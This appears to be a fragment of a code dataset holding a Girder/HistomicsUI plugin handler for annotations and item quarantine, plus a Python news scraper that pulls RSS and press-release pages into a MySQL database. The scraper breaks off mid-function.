"line_number": 222, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.STRICT_SHAPE", "line_number": 223, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 223, "usage_type": "name"}, {"api_name": "dagster.solid", "line_number": 227, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 230, "usage_type": "call"}, {"api_name": "dagster.Selector", "line_number": 233, "usage_type": "call"}, {"api_name": "dagster.Noneable", "line_number": 234, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 243, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 247, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.ARRAY", "line_number": 253, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 253, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.ARRAY", "line_number": 262, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 262, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.NONEABLE", "line_number": 268, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 268, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.ARRAY", "line_number": 270, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 270, "usage_type": "name"}, {"api_name": "dagster.solid", "line_number": 274, "usage_type": "name"}, {"api_name": "dagster.resource", "line_number": 278, "usage_type": "call"}, {"api_name": "dagster.resource", "line_number": 282, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 286, "usage_type": "call"}, {"api_name": "dagster.ModeDefinition", "line_number": 288, "usage_type": "call"}, {"api_name": "dagster.ModeDefinition", "line_number": 289, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 295, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 310, "usage_type": "call"}, {"api_name": "dagster.ScalarUnion", "line_number": 310, "usage_type": "call"}, {"api_name": "dagster.config.field.resolve_to_config_type", "line_number": 310, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 314, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 318, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.STRICT_SHAPE", "line_number": 327, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 327, "usage_type": "name"}]}
+{"seq_id": "647134160", "text": "import datetime\nimport json\n\nfrom girder import logger\nfrom girder.constants import AccessType\nfrom girder.exceptions import RestException\nfrom girder.models.file import File\nfrom girder.models.folder import Folder\nfrom girder.models.item import Item\nfrom girder.models.setting import Setting\nfrom girder.models.user import User\nfrom girder_large_image_annotation.models.annotation import Annotation\n\nfrom .constants import PluginSettings\n\n\ndef _itemFromEvent(event, identifierEnding, itemAccessLevel=AccessType.READ):\n \"\"\"\n If an event has a reference and an associated identifier that ends with a\n specific string, return the associated item, user, and image file.\n\n :param event: the data.process event.\n :param identifierEnding: the required end of the identifier.\n :returns: a dictionary with item, user, and file if there was a match.\n \"\"\"\n info = event.info\n identifier = None\n reference = info.get('reference', None)\n if reference is not None:\n try:\n reference = json.loads(reference)\n if (isinstance(reference, dict) and\n isinstance(reference.get('identifier'), str)):\n identifier = reference['identifier']\n except (ValueError, TypeError):\n logger.debug('Failed to parse data.process reference: %r', reference)\n if identifier is not None and identifier.endswith(identifierEnding):\n if 'userId' not in reference or 'itemId' not in reference or 'fileId' not in reference:\n logger.error('Reference does not contain required information.')\n return\n\n userId = reference['userId']\n imageId = reference['fileId']\n\n # load models from the database\n user = User().load(userId, force=True)\n image = File().load(imageId, level=AccessType.READ, user=user)\n item = Item().load(image['itemId'], level=itemAccessLevel, user=user)\n return {'item': item, 'user': user, 'file': image}\n\n\ndef process_annotations(event):\n \"\"\"Add annotations to an image on a ``data.process`` event\"\"\"\n results = _itemFromEvent(event, 'AnnotationFile')\n if not results:\n return\n item = results['item']\n user = results['user']\n\n file = File().load(\n event.info.get('file', {}).get('_id'),\n level=AccessType.READ, user=user\n )\n\n if not file:\n logger.error('Could not load models from the database')\n return\n try:\n data = json.loads(b''.join(File().download(file)()).decode('utf8'))\n except Exception:\n logger.error('Could not parse annotation file')\n raise\n\n if not isinstance(data, list):\n data = [data]\n for annotation in data:\n try:\n Annotation().createAnnotation(item, user, annotation)\n except Exception:\n logger.error('Could not create annotation object from data')\n raise\n\n\ndef quarantine_item(item, user, makePlaceholder=True):\n \"\"\"\n Quarantine an item, marking which user did it. 
Note that this raises\n RestExceptions for failures.\n\n :param user: the user doing the quarantining.\n :param item: an item to quarantine.\n :returns: the modified item.\n \"\"\"\n folder = Setting().get(PluginSettings.HUI_QUARANTINE_FOLDER)\n if not folder:\n raise RestException('The quarantine folder is not configured.')\n folder = Folder().load(folder, force=True, exc=True)\n if not folder:\n raise RestException('The quarantine folder does not exist.')\n if str(folder['_id']) == str(item['folderId']):\n raise RestException('The item is already in the quarantine folder.')\n originalFolder = Folder().load(item['folderId'], force=True)\n quarantineInfo = {\n 'originalFolderId': item['folderId'],\n 'originalBaseParentType': item['baseParentType'],\n 'originalBaseParentId': item['baseParentId'],\n 'originalUpdated': item['updated'],\n 'quarantineUserId': user['_id'],\n 'quarantineTime': datetime.datetime.utcnow()\n }\n item = Item().move(item, folder)\n if makePlaceholder:\n placeholder = Item().createItem(\n item['name'] + ' [Removed - Quarantined]',\n {'_id': item['creatorId']}, originalFolder,\n description=item['description'])\n quarantineInfo['placeholderItemId'] = placeholder['_id']\n item.setdefault('meta', {})['quarantine'] = quarantineInfo\n item = Item().updateItem(item)\n if makePlaceholder:\n placeholderInfo = {\n 'quarantined': True,\n 'quarantineTime': quarantineInfo['quarantineTime']\n }\n placeholder.setdefault('meta', {})['quarantine'] = placeholderInfo\n placeholder = Item().updateItem(placeholder)\n return item\n\n\ndef restore_quarantine_item(item, user):\n \"\"\"\n Unquarantine an item, returning it to its original location. Note that\n this raises RestExceptions for failures.\n\n :param item: an item to unquarantine.\n :returns: the modified item.\n \"\"\"\n if not item.get('meta', {}).get('quarantine'):\n raise RestException('The item has no quarantine record.')\n folder = Folder().load(item['meta']['quarantine']['originalFolderId'], force=True)\n if not folder:\n raise RestException('The original folder is not accessible.')\n if 'placeholderItemId' in item['meta']['quarantine']:\n placeholder = Item().load(item['meta']['quarantine']['placeholderItemId'], force=True)\n else:\n placeholder = None\n item = Item().move(item, folder)\n item['updated'] = item['meta']['quarantine']['originalUpdated']\n del item['meta']['quarantine']\n item = Item().updateItem(item)\n if placeholder is not None:\n Item().remove(placeholder)\n return item\n\n\ndef process_metadata(event):\n \"\"\"Add metadata to an item on a ``data.process`` event\"\"\"\n results = _itemFromEvent(event, 'ItemMetadata', AccessType.WRITE)\n if not results:\n return\n file = File().load(\n event.info.get('file', {}).get('_id'),\n level=AccessType.READ, user=results['user']\n )\n\n if not file:\n logger.error('Could not load models from the database')\n return\n try:\n data = json.loads(b''.join(File().download(file)()).decode('utf8'))\n except Exception:\n logger.error('Could not parse metadata file')\n raise\n\n item = results['item']\n Item().setMetadata(item, data, allowNull=False)\n", "sub_path": "histomicsui/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 6412, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "girder.constants.AccessType.READ", "line_number": 17, "usage_type": "attribute"}, {"api_name": "girder.constants.AccessType", "line_number": 17, "usage_type": "name"}, {"api_name": "json.loads", 
"line_number": 31, "usage_type": "call"}, {"api_name": "girder.logger.debug", "line_number": 36, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 36, "usage_type": "name"}, {"api_name": "girder.logger.error", "line_number": 39, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 39, "usage_type": "name"}, {"api_name": "girder.models.user.User", "line_number": 46, "usage_type": "call"}, {"api_name": "girder.models.file.File", "line_number": 47, "usage_type": "call"}, {"api_name": "girder.constants.AccessType.READ", "line_number": 47, "usage_type": "attribute"}, {"api_name": "girder.constants.AccessType", "line_number": 47, "usage_type": "name"}, {"api_name": "girder.models.item.Item", "line_number": 48, "usage_type": "call"}, {"api_name": "girder.models.file.File", "line_number": 60, "usage_type": "call"}, {"api_name": "girder.constants.AccessType.READ", "line_number": 62, "usage_type": "attribute"}, {"api_name": "girder.constants.AccessType", "line_number": 62, "usage_type": "name"}, {"api_name": "girder.logger.error", "line_number": 66, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 66, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 69, "usage_type": "call"}, {"api_name": "girder.models.file.File", "line_number": 69, "usage_type": "call"}, {"api_name": "girder.logger.error", "line_number": 71, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 71, "usage_type": "name"}, {"api_name": "girder_large_image_annotation.models.annotation.Annotation", "line_number": 78, "usage_type": "call"}, {"api_name": "girder.logger.error", "line_number": 80, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 80, "usage_type": "name"}, {"api_name": "girder.models.setting.Setting", "line_number": 93, "usage_type": "call"}, {"api_name": "constants.PluginSettings.HUI_QUARANTINE_FOLDER", "line_number": 93, "usage_type": "attribute"}, {"api_name": "constants.PluginSettings", "line_number": 93, "usage_type": "name"}, {"api_name": "girder.exceptions.RestException", "line_number": 95, "usage_type": "call"}, {"api_name": "girder.models.folder.Folder", "line_number": 96, "usage_type": "call"}, {"api_name": "girder.exceptions.RestException", "line_number": 98, "usage_type": "call"}, {"api_name": "girder.exceptions.RestException", "line_number": 100, "usage_type": "call"}, {"api_name": "girder.models.folder.Folder", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 108, "usage_type": "attribute"}, {"api_name": "girder.models.item.Item", "line_number": 110, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 112, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 118, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 125, "usage_type": "call"}, {"api_name": "girder.exceptions.RestException", "line_number": 138, "usage_type": "call"}, {"api_name": "girder.models.folder.Folder", "line_number": 139, "usage_type": "call"}, {"api_name": "girder.exceptions.RestException", "line_number": 141, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 143, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 146, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 149, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 151, 
"usage_type": "call"}, {"api_name": "girder.constants.AccessType.WRITE", "line_number": 157, "usage_type": "attribute"}, {"api_name": "girder.constants.AccessType", "line_number": 157, "usage_type": "name"}, {"api_name": "girder.models.file.File", "line_number": 160, "usage_type": "call"}, {"api_name": "girder.constants.AccessType.READ", "line_number": 162, "usage_type": "attribute"}, {"api_name": "girder.constants.AccessType", "line_number": 162, "usage_type": "name"}, {"api_name": "girder.logger.error", "line_number": 166, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 166, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 169, "usage_type": "call"}, {"api_name": "girder.models.file.File", "line_number": 169, "usage_type": "call"}, {"api_name": "girder.logger.error", "line_number": 171, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 171, "usage_type": "name"}, {"api_name": "girder.models.item.Item", "line_number": 175, "usage_type": "call"}]}
+{"seq_id": "455874963", "text": "#! /usr/bin/python3\n\n# web_scraper.py 1st part of the project, to get the data from the \n# websites and store it in a mysql database\n\nimport requests,feedparser,pprint,pymysql,datetime,re,sys\nfrom bs4 import BeautifulSoup\nfrom time import mktime\nfrom datetime import timedelta\nfrom langdetect import detect\nfrom selenium import webdriver\n\ndef dbCred():\n connList = []\n try:\n from db import connection_properties\n conn = pymysql.connect(**connection_properties)\n curr = conn.cursor(pymysql.cursors.DictCursor)\n connList.append(conn)\n connList.append(curr)\n return connList\n except pymysql.err.OperationalError:\n sys.exit(\"Invalid Input: Wrong username/db or password found, please try again\")\n\ndbDets = dbCred()\n\n\n###############################################################################\n#db inserts/updates/country finder/check language and dates functions\n###############################################################################\n\ndef loop_len_of_titles(titles,info,links,dates,source,user):\n for z in range(len(titles)):\n \n country = findCountries(titles[z])\n if country is None:\n country = findCountries(info[z])\n if dates[z].tzinfo is not None:\n dates[z] = dates[z].replace(tzinfo=None)\n \n sevenDaysBehind = datetime.datetime.today() - timedelta(7)\n is_english = detect(titles[z])\n \n if dates[z] > sevenDaysBehind and is_english == 'en':\n \n if isinstance(source, list):\n if(insertIntoDb(titles[z],info[z],links[z],dates[z],source[z],country,user) == False):\n continue\n else:\n if(insertIntoDb(titles[z],info[z],links[z],dates[z],source,country,user) == False):\n continue\n \n else:\n continue\n \n#Find countries\ndef findCountries(desc):\n country = ''\n countries = []\n try:\n findCountry = \"SELECT country_id,country_name FROM countries\"\n dbDets[1].execute(findCountry,)\n rows = dbDets[1].fetchall()\n for row in rows:\n countries.append(row['country_name'])\n \n country_alias = \"SELECT country_id_alias, country_alias FROM countries_aliases\"\n dbDets[1].execute(country_alias,)\n items = dbDets[1].fetchall()\n for i in items:\n countries.append(i['country_alias'])\n \n \n except Exception as e:\n print(str(e))\n \n indexes = [desc.find(country) for country in countries]\n found_countries = [(index,country) for index,country in zip(indexes,countries) if index != -1]\n try: \n country = str(min(found_countries)[1])\n return country\n except:\n pass\n\n#insert data into db \ndef insertIntoDb(title,desc,link,date,source,country,user):\n\n \n try:\n checkDuplicate = \"SELECT * FROM articles\"\n dbDets[1].execute(checkDuplicate,)\n rows = dbDets[1].fetchall()\n for row in rows:\n if row['article_link'] == link:\n return False\n \n except Exception as e:\n print('Error is a :' + str(e))\n \n try:\n sql = \"INSERT INTO articles(article_title,article_desc,article_link,article_date,approval,not_sent,article_source,article_country,user) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n dbDets[1].execute(sql,(title,desc,link,date.strftime('%Y-%m-%d %H:%M:%S'),0,0,source,country,user),)\n dbDets[0].commit()\n return True\n \n except Exception as e:\n print('Error is on into: ' + str(e))\n\ndef insertImgLink(imgLink,link):\n try:\n sql1 = \"UPDATE articles SET img_link = %s WHERE article_link = %s\"\n dbDets[1].execute(sql1,(imgLink,link),)\n dbDets[0].commit()\n except Exception:\n pass\n \n\n###############################################################################\n#Connection 
functions\n############################################################################### \n\ndef beautiful_soup_conn(url,headers=None):\n try:\n if headers is not None:\n request = requests.get(url,headers=headers,verify=False,timeout=10)\n else:\n request = requests.get(url)\n \n except Exception as e:\n print(str(e))\n return None\n \n soup = BeautifulSoup(request.text,'lxml')\n titles = []\n links = []\n dates = []\n info = []\n \n return (soup,titles,links,dates,info)\n\n\ndef phantom_selenium_conn(url):\n driver = webdriver.PhantomJS()\n driver.get(url)\n soup = BeautifulSoup(driver.page_source,'lxml')\n #quit the headless browser once the page source has been captured\n driver.quit()\n titles = []\n links = []\n dates = []\n info = []\n \n return (soup,titles,links,dates,info)\n\n\ndef rss(url,parsed=None,is_google=None):\n d = feedparser.parse(url)\n articles = d['entries']\n dates = []\n links = []\n titles = []\n info = []\n #one source domain per article (only used for Google Alerts feeds)\n sources = []\n \n \n for article in articles:\n \n is_english = detect(article.title)\n \n if is_english == 'en':\n if parsed is not None:\n dates.append(article[parsed])\n else:\n dates.append(article['published'])\n links.append(article['link'])\n titles.append(article['title'])\n if 'summary' in article.keys():\n info.append(article['summary'])\n elif 'description' in article.keys():\n info.append(article['description'])\n else:\n info.append(article.title_detail['value'])\n\n else:\n continue\n if is_google is not None:\n #extract the target site domain from the Google Alerts redirect link;\n #append per article so each entry keeps its own source\n li = str(article.links[0]['href'])\n lRegex = re.compile(r'(https?:\\/\\/?[\\da-z\\.-]+\\.[a-z\\.]{2,6})')\n mo = lRegex.findall(li)\n if len(mo) > 1:\n sources.append(mo[1])\n else:\n sources.append('')\n if is_google is not None: \n return (titles,info,links,dates,sources)\n else:\n return (titles,info,links,dates)\n\n\n\n###############################################################################\n#RSS functions\n###############################################################################\n\ndef adbNews():\n \n titles,info,links,dates = rss('http://feeds.feedburner.com/adb_news')\n dates = [datetime.datetime.strptime(x,\"%Y-%m-%d %H:%M:%S\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'https://www.adb.org/','cmorris07@googlemail.com')\n \n\n#handle google alerts\ndef googleAlerts():\n urls = [\n 'https://www.google.com/alerts/feeds/14304456731170822711/5490252527890928599',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3125987915994111902',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3125987915994110836',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10917621377361780908',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10335087150361081398',\n 'https://www.google.com/alerts/feeds/14304456731170822711/16198033950663986430',\n 'https://www.google.com/alerts/feeds/14304456731170822711/9184124621001190741',\n 'https://www.google.com/alerts/feeds/14304456731170822711/6241400375173254463',\n 'https://www.google.com/alerts/feeds/14304456731170822711/14931461957889737766',\n 'https://www.google.com/alerts/feeds/14304456731170822711/13423129096405111750',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3240663568688569318',\n 'https://www.google.com/alerts/feeds/14304456731170822711/8787201316844078335',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10458033540308670343',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10093970578452393789',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10866374380232787945',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3934103197685012426',\n 
'https://www.google.com/alerts/feeds/14304456731170822711/8090980585227987112',\n 'https://www.google.com/alerts/feeds/14304456731170822711/4606697022711377182',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3125987915994111499',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10335087150361080607',\n 'https://www.google.com/alerts/feeds/14304456731170822711/5149293183964443130',\n 'https://www.google.com/alerts/feeds/14304456731170822711/240674413678724797',\n 'https://www.google.com/alerts/feeds/14304456731170822711/15697794017020091251',\n 'https://www.google.com/alerts/feeds/14304456731170822711/11638663718329821209',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3188984184713995251'\n ]\n \n \n for url in urls:\n \n titles,info,links,dates,source = rss(url,parsed='updated_parsed',is_google=True)\n dates = [datetime.datetime.fromtimestamp(mktime(x)) for x in dates]\n loop_len_of_titles(titles,info,links,dates,source,'cmorris07@googlemail.com')\n \n\ndef xl():\n \n titles,info,links,dates = rss('http://xlgroup.com/press/rss')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %z\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'http://xlgroup.com','cmorris07@googlemail.com')\n \n \ndef eib():\n \n titles,info,links,dates = rss('http://www.eib.org/infocentre/press/index.rss')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %Z\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'http://www.eib.org/','cmorris07@googlemail.com')\n \ndef jbic():\n \n titles,info,links,dates = rss('http://www.jbic.go.jp/en/information/press/feed')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %z\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'http://www.jbic.go.jp/en','cmorris07@googlemail.com')\n\ndef euler_hermes():\n \n titles,info,links,dates = rss('http://www.eulerhermes.com/rss-euler-hermes-group.xml')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %Z\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'http://www.eulerhermes.com','cmorris07@googlemail.com')\n \ndef db():\n \n titles,info,links,dates = rss('https://socialmedia.db.com/newsroom/v1/feed/allen')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %Z\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'https://www.db.com','cmorris07@googlemail.com')\n\ndef clydeco():\n \n titles,info,links,dates = rss('https://www.clydeco.com/feeds/news',parsed='updated_parsed')\n dates = [datetime.datetime.fromtimestamp(mktime(x)) for x in dates]\n loop_len_of_titles(titles,info,links,dates,'https://www.clydeco.com','cmorris07@googlemail.com')\n \n\ndef glencore():\n \n titles,info,links,dates = rss('http://www.glencore.com/media/news/rss/')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %z\") for x in dates] \n loop_len_of_titles(titles,info,links,dates,'http://www.glencore.com','cmorris07@googlemail.com')\n\n###############################################################################\n#Beautiful Soup functions\n############################################################################### \n \ndef dsConceptNews():\n \n main_url = 'http://www.ds-concept.net/en/news/all-news/'\n \n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n articles = soup.find_all(\"li\",{'data-type':'Press'})\n\n for items in articles:\n\n title_text = items.h1.text.strip()\n titles.append(title_text)\n links.append(items.a['href'])\n 
dates.append(items.span.text.strip())\n\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n div_container = sopa.find(\"div\",{ \"class\":\"dsc-left-content\" })\n try:\n info.append(div_container.p.text.strip())\n except Exception:\n info.append('')\n pass\n \n dates = [datetime.datetime.strptime(x,'%Y-%m-%d') for x in dates] \n \n loop_len_of_titles(titles,info,links,dates,'http://www.ds-concept.net/en/home/','cmorris07@googlemail.com')\n\n\ndef falconGroup():\n \n main_url = 'https://www.falcongrp.com/news-and-events/'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n sources = []\n \n articles = soup.find_all('article',{'class':'category-news'})\n\n for items in articles:\n \n\n dates.append(items.find('span',{'class' : 'time'}).text.strip())\n titles.append(items.h5.text.strip())\n linkRegex = re.compile(r'(https?:\\/\\/?[\\da-z\\.-]+\\.[a-z\\.]{2,6})')\n mo = linkRegex.search(items.h5.a['href'])\n if mo == None:\n link = 'https://www.falcongrp.com/news-and-events/' + items.h5.a['href']\n source = 'https://www.falcongrp.com/'\n sources.append(source)\n links.append(link)\n else:\n sources.append(mo.group())\n links.append(items.h5.a['href'])\n first_p_elem = items.p\n next_p_elem = first_p_elem.findNext('p')\n info.append(next_p_elem.text.strip())\n\n \n dates = [datetime.datetime.strptime(x,'%d %B, %Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,sources,'cmorris07@googlemail.com')\n \n \ndef thaiExim():\n main_url = 'http://www.exim.go.th/en/newsroom/pressRelease_V2.aspx'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) \\\n AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'\n }\n try:\n \n soup,titles,links,dates,info = beautiful_soup_conn(main_url,headers = headers)\n except Exception as e:\n #print('Thai exim error ' + str(e))\n return None\n\n \n td = soup.find_all('td',{'align' : 'right'})\n for item in td:\n dt_obj = datetime.datetime.strptime(item.span.text + ' 00:00:00','%d %B %Y %H:%M:%S')\n dates.append(dt_obj)\n \n a = soup.find_all('a',onclick=True)\n for item in a:\n titles.append(item.text)\n \n linkRegex = re.compile(r'\\/[\\da-z\\.-_]+\\/[\\da-z\\.-_]+\\/[\\da-z\\.-_]+\\.[a-z\\.]{2,6}')\n \n mo = linkRegex.search(item['onclick'])\n if mo is not None:\n link = 'http://www.exim.go.th' + mo.group()\n links.append(link)\n info.append('')\n \n loop_len_of_titles(titles,info,links,dates,'http://www.exim.go.th','cmorris07@googlemail.com')\n \n\n \n \ndef russianDIF():\n \n main_url = 'https://rdif.ru/Eng_Press/page/1/'\n \n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'https://rdif.ru'\n article_container = soup.find('div',{'class':'app-news-page'})\n articles = article_container.find_all('p')\n \n for items in articles:\n links.append(prefix + items.a['href'].strip())\n titles.append(items.a.text.strip())\n dates.append(items.span.span.text.strip())\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n p_elem_container = sopa.find('div',{'class':'app-news-page'})\n p_elem = p_elem_container.find_all('p')\n info.append(p_elem[1].text.strip())\n \n dates = [datetime.datetime.strptime(x,'%d.%m.%Y') for x in dates]\n \n \n loop_len_of_titles(titles,info,links,dates,'https://rdif.ru/Eng_Index/','cmorris07@googlemail.com')\n \n \n\ndef misysScraper():\n \n main_url = 'http://www.misys.com/fintech-insights/press-releases/all/'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n 
\n articles = soup.find_all('li',{'class' : 'list-block list-article'})\n for items in articles:\n \n titles.append(items.h3.text.strip())\n links.append(items.h3.a['href'])\n p_elem = items.find_all('p')\n dates.append(p_elem[0].text.strip())\n info.append(p_elem[1].text.strip())\n \n date_regex = re.compile(r'((\\w)+,(\\s)(\\w)+(\\s)(\\d)+)')\n mo = [date_regex.search(x) for x in dates]\n \n dates = [re.sub('(\\d)((st|nd|rd|th),)',r'\\1',x.group()) for x in mo if x is not None]\n dates = [datetime.datetime.strptime(x,'%d %B %Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'http://www.misys.com/','cmorris07@googlemail.com')\n \n \n\n \n \ndef baswareScraper():\n \n main_url = 'http://www.basware.com/en-us/news?page=1'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n\n prefix = 'http://www.basware.com' \n \n articles = soup.find_all('a',{'class':'cta-card'})\n for items in articles:\n links.append(prefix + items['href'].strip())\n items.h6.i.extract()\n dates.append(items.h6.text.strip())\n titles.append(items.h3.text.strip())\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n p_elem_container = sopa.find('div',{'class':'article-text'})\n p_elem = p_elem_container.find_all('p')\n info.append(p_elem[0].text.strip())\n \n dates = [datetime.datetime.strptime(x,'%A, %d %b %Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \n \ndef swiftScraper():\n \n \n main_url = 'https://www.swift.com/insights/press-releases'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'https://www.swift.com'\n \n articles = soup.find_all('div',{'class' : 'ds-1col node node-news view-mode-news_channel clearfix'})\n for items in articles:\n dates.append(items.find('span',{'class':'date-display-single'}).text.strip())\n titles.append(items.h2.text.strip())\n info.append(items.p.text.strip())\n links.append(prefix + items.a['href'])\n \n dates = [datetime.datetime.strptime(x,'%d %B %Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \n \n \ndef cofaceScraper():\n \n \n\n main_url = 'http://www.coface.com/News-Publications/News'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n prefix = 'http://www.coface.com'\n \n articles_container = soup.find('div',{'id' : 'real-content' })\n \n #top article scrape\n h_elem = articles_container.find('h2')\n links.append(prefix + h_elem.a['href'])\n titles.append(h_elem.text.strip())\n info.append(articles_container.find('div',{'class':'to-one'}).text.strip())\n dates.append(articles_container.find('span').text.strip())\n \n #all news block\n articles = articles_container.find('div',{'class':'all_news block'})\n span_dates = articles.find_all('span',{'class':'date'})\n dates += [x.text.strip() for x in span_dates]\n h_titles = articles.find_all('h4')\n titles += [x.text.strip() for x in h_titles]\n p_elem = articles.find_all('p')\n info += [x.text.strip() for x in p_elem]\n links += [prefix + x.a['href'].strip() for x in h_titles]\n \n dates = [datetime.datetime.strptime(x,'%m/%d/%Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \ndef whiteAndCaseScraper():\n \n main_url = 'https://www.whitecase.com/news/newsroom?fulltext=&type=All&service=All&date_start[date]=&date_end[date]=&sort_by=field_date&sort_order=DESC&page=0&field_date[date_start]&field_date_1[date_end]'\n soup,titles,links,dates,info = 
beautiful_soup_conn(main_url)\n \n prefix = 'https://www.whitecase.com'\n articles = soup.find_all('a',{'class':'list-item-link'})\n \n for items in articles:\n links.append(prefix + items['href'].strip())\n dates.append(items.span.text)\n titles.append(items.h2.text)\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n p_elem = sopa.find('section',{'itemprop':'articleBody'})\n info.append(p_elem.p.text.strip())\n \n dates = [datetime.datetime.strptime(x,'%d %b %Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \ndef capitalBusinessCreditScraper():\n \n \n main_url = 'http://www.whiteoaksf.com/Media.html'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n years_div = soup.find_all('div',{'class':'news-L-panel'})\n articles = soup.find_all('div',{'class':'news-R-panel'})\n\n dt = []\n \n #get all years; the year is a separate element from the rest of the date\n years = [x.text.strip() for x in years_div]\n \n for article in articles:\n dates.append(article.find_all('div',{'class' : 'news-date'}))\n \n titles += [x.text.strip() for x in article.find_all('div',{'class':'news-title'})]\n \n links += [x['href'] for x in article.find_all('a',{'class':'news-list'})]\n\n #loop through the date blocks, one per year\n for x in range(len(dates)):\n #dates is a list of lists (one list of day/month entries per year block),\n #so loop through the inner list and take the text of each entry\n for i in dates[x]:\n #date formats differ across the page, so try both formats\n try:\n dt_obj = datetime.datetime.strptime(i.text.lstrip(' ') + ' ' + years[x], '%d %b %Y')\n except ValueError:\n dt_obj = datetime.datetime.strptime(i.text.lstrip(' ') + ' ' + years[x], '%d %B %Y')\n \n info.append('')\n #collect the parsed datetime\n dt.append(dt_obj)\n \n 